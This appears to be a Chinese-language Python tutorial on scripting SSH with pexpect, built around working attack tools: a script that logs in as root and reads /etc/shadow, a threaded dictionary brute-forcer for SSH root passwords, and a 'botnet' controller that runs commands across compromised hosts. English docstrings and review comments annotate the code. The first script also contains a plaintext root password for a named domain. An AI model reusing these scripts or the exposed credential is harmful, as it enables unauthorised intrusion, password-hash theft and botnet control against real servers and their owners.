利用python连接并控制SSH

使用pexpect来连接ssh

(该工具只能在linux下使用)

python连接ssh并且执行命令,显示输出结果

#!/usr/bin/python
import pexpect
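# Prompt patterns handed to child.expect(); pexpect compiles each entry as a
# regular expression, so the shell '$' is escaped.  A raw string keeps the
# same matched text but avoids the invalid-escape warning that '\$' triggers
# on newer Python versions.
PROMPT = ['# ', '>>> ', '> ', r'\$ ']


def send_command(child, cmd):
    """Send *cmd* to the spawned ssh session and print its output.

    Writes the command line, waits until one of the PROMPT patterns shows up
    and prints ``child.before`` (everything received before that prompt).
    Returns None.
    """
    child.sendline(cmd)
    child.expect(PROMPT)
    print(child.before)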

def connect(user, host, password):
    """Spawn ``ssh user@host`` and drive it to a shell prompt.

    Returns the pexpect child positioned at one of the PROMPT patterns, or
    None (after printing "[-] Error Connecting") when pexpect times out
    before a password prompt appears.

    Two properties worth knowing before reusing this helper:
    - an unknown host key is accepted automatically by answering "yes", so
      the remote host's identity is never verified; a pre-populated
      known_hosts file is the safer alternative
    - the command line is assembled by string concatenation, so *user* and
      *host* must come from a trusted source
    """
    new_key_prompt = 'Are you sure you want to continue connecting (yes/no)?'
    child = pexpect.spawn('ssh ' + user + '@' + host)
    # index 0 = timeout, 1 = host-key question, 2 = password prompt
    # ('[P|p]assword: ' is a character class; it also matches '|assword: ')
    outcome = child.expect([pexpect.TIMEOUT, new_key_prompt, '[P|p]assword: '])
    if outcome == 1:
        print("send yes to server!\n")
        child.sendline('yes')
        # once the key is accepted only timeout (0) or password prompt (1) remain
        outcome = child.expect([pexpect.TIMEOUT, '[P|p]assword: '])
    if outcome == 0:
        print('[-] Error Connecting')
        return None
    child.sendline(password)
    child.expect(PROMPT)
    return child
# NOTE(review): host and password are hard-coded in source; read them from
# the environment or a config file instead of committing them.
ss = connect("root","heiyiren.top","heiyiren312429020!@#")
# connect() returns None when it times out; in that case the next call raises
# AttributeError on ss.sendline, so check ss before using it.
send_command(ss,'cat /etc/shadow | grep root')

使用 pxssh来暴力破解密码

#!/usr/bin/python
from pexpect import pxssh
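# Prompt regexes for pexpect's expect(); not referenced in this script, since
# send_command() below relies on pxssh's own prompt() instead.  Raw string
# keeps the escaped '$' without an invalid-escape warning.
PROMPT = ['# ', '>>> ', '> ', r'\$ ']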
def send_command(child, cmd):
    """Run *cmd* in an established pxssh session and print its output.

    pxssh's prompt() waits for the shell prompt it synchronised on during
    login, so no pattern list is needed here; ``child.before`` holds the
    text received before that prompt.  Returns None.
    """
    child.sendline(cmd)
    child.prompt()
    output = child.before
    print(output)

def connect(user, host, password):
    """Log in to *host* as *user* with pxssh.

    Returns the pxssh session (after printing a "[+] Password Found" line)
    when login succeeds.  Any exception raised by pxssh is swallowed and
    None is returned, so callers must check the result before using it.
    """
    try:
        session = pxssh.pxssh()
        session.login(host, user, password)
        print("[+] Password Found : " + password)
    except Exception:
        # pxssh signals a failed login by raising; report it as "no session"
        return None
    return session

# NOTE(review): host and credentials are hard-coded; load them from a config
# file or the environment instead.
ss = connect("root","heiyiren.top","xxxxxx")
# connect() returns None on any login failure, so this raises AttributeError
# unless the login succeeded — check ss first.
send_command(ss,'cat /etc/shadow | grep root')

这里需要引用一个 BoundedSemaphore 信号量

该信号量对应经典的 P/V 操作,具体使用方式如下:

connection_lock = BoundedSemaphore(value=maxConnections)
connection_lock.acquire() 进入临界区,每次调用使可用计数减 1(maxConnections -= 1),最多可连续使用 maxConnections 次;计数减到 0 后(此处为第六次调用)会阻塞等待,直到有线程执行了 release 才能继续。
connection_lock.release() 离开临界区,使计数加 1(maxConnections += 1);若计数超过初始的 maxConnections,则会抛出异常。

利用字典暴力破解密码

#!/usr/bin/python
from pexpect import pxssh
from threading import *
import time
maxConnections = 5  # upper bound on simultaneous login attempts
# BoundedSemaphore comes from the `from threading import *` above; calling
# release() more times than acquire() (count above the initial value) raises.
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False  # set to True by a worker thread on a successful login; read by main()
fails = 0  # counter of socket-timeout retries; main() stops once it exceeds 5
def connect(host,user,passwd,release):
    """Attempt one SSH login with *passwd* and record success in ``Found``.

    Runs on a worker thread started by main().  ``release`` says whether this
    call owns a slot of ``connection_lock`` that must be handed back in the
    ``finally`` block; the recursive retries below pass a falsy value so only
    the outermost call releases.  Retry decisions are made by inspecting the
    exception text.
    """
    global Found
    # NOTE(review): `Fails` differs in case from the module-level `fails`
    # assigned above, so `fails = fails + 1` below rebinds a function-local
    # name rather than the shared counter.
    global Fails
    try:
        s = pxssh.pxssh()
        s.login(host,user,passwd)
        Found = True
        print "[+] Found Password: "+passwd
    except Exception as e:
        if 'read_nunblocking' in str(e):
            fails = fails + 1
            time.sleep(5)
            # NOTE(review): `false` is not a Python name (the builtin is `False`)
            connect(host,user,passwd,false)
        elif 'synchronize with original prompt' in str(e):
            time.sleep(1)
            connect(host,user,passwd,false)
    finally:
        # give the semaphore slot back only from the call that acquired it
        if release:
            connection_lock.release()
def main():
    """Read candidates from the file ``password`` and try each on its own thread.

    ``connection_lock`` caps the number of in-flight attempts at
    ``maxConnections``; acquire() here blocks until a worker's ``finally``
    block releases a slot.  The loop stops once a worker has set ``Found`` or
    ``fails`` exceeds 5.  Workers are never joined, so the function can
    return while attempts are still running.
    """
    global Found  # declared global although this function only reads it
    with open("password","r") as f :
        for i in f.readlines():
            # Found is set asynchronously by a worker and only checked before
            # dispatching the next candidate, so attempts already started keep running.
            if Found:
                print "[*] Exiting : Password Found"
                exit(0)
            if fails > 5 :
                print "[!] Exiting : Too Many Socket Timeouts"
                exit(0)
            i = i.strip("\n").strip("\r")  # drop the trailing newline / CR
            connection_lock.acquire()  # blocks while maxConnections workers are active
            print "[-] Testing password :" + i
            # release=True: the worker hands the semaphore slot back when it finishes.
            # NOTE(review): host and user are hard-coded here.
            t = Thread(target=connect,args=("heiyiren.top","root",i,True))
            t.start()
if __name__ == '__main__':
    main()  # run only when executed as a script, not when imported

可以进一步改进:把 IP 地址、用户名和密码文件做成可指定的参数,而不是在代码中写死;不过核心功能已经完成。

编写脚本控制强大的僵尸网络

#!/usr/bin/python
from pexpect import pxssh


class Client:
    """One SSH session to a single host, opened at construction time.

    ``session`` is the pxssh object returned by connect(), or None when the
    login raised, because connect() only prints the error in that case.
    """
    def __init__(self,host,user,passwd):
        self.host = host
        self.user = user
        self.passwd = passwd
        self.session = self.connect()  # connects eagerly; may leave session as None
    def connect(self):
        """Log in with pxssh; return the session, or None after printing the failure."""
        try:
            s = pxssh.pxssh()
            s.login(self.host,self.user,self.passwd)
            return s
        except Exception as e:
            # any failure is reported and swallowed; the caller receives None
            print '[-] host:'+self.host+' except. reason:',e
    def send_command(self,cmd):
        """Run *cmd* on the remote shell and return the text received before the next prompt.

        Raises AttributeError when ``session`` is None, i.e. the login in
        connect() failed.
        """
        self.session.sendline(cmd)
        self.session.prompt()
        return self.session.before
def botnet_command(cmd):
    """Run *cmd* on every Client in the module-level ``botNet`` list and print each result.

    Hosts are processed one after another in list order.  A Client whose
    login failed has ``session`` set to None, so send_command() raises there
    and the remaining hosts are not reached.
    """
    for client in botNet:
        output = client.send_command(cmd)
        print '[*] Output from ' + client.host
        print '[+] ' + output + '\n'
def addClient(host,user,password):
    """Create a Client (which logs in immediately) and append it to ``botNet``.

    No check is made that the login succeeded; see Client.connect().
    """
    client = Client(host,user,password)
    botNet.append(client)
# List of Client objects; filled by addClient(), read by botnet_command().
# Defined after the functions that use it, which works because the name is
# looked up at call time.
botNet = []
#addClient("127.0.0.1","root","toor")
# NOTE(review): host and credentials are hard-coded; load them from a config file instead.
addClient("heiyiren.top","root","xxxxxx")
botnet_command('uname -v')

当然,代码还缺少对Client连接是否成功的检查,自行补全 :)